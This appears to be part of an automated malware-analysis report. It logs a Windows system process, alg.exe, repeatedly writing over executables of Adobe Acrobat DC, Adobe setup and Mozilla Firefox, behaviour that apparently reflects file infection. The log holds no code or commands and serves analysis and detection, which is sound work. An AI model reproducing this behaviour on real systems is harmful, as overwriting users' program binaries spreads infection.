Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
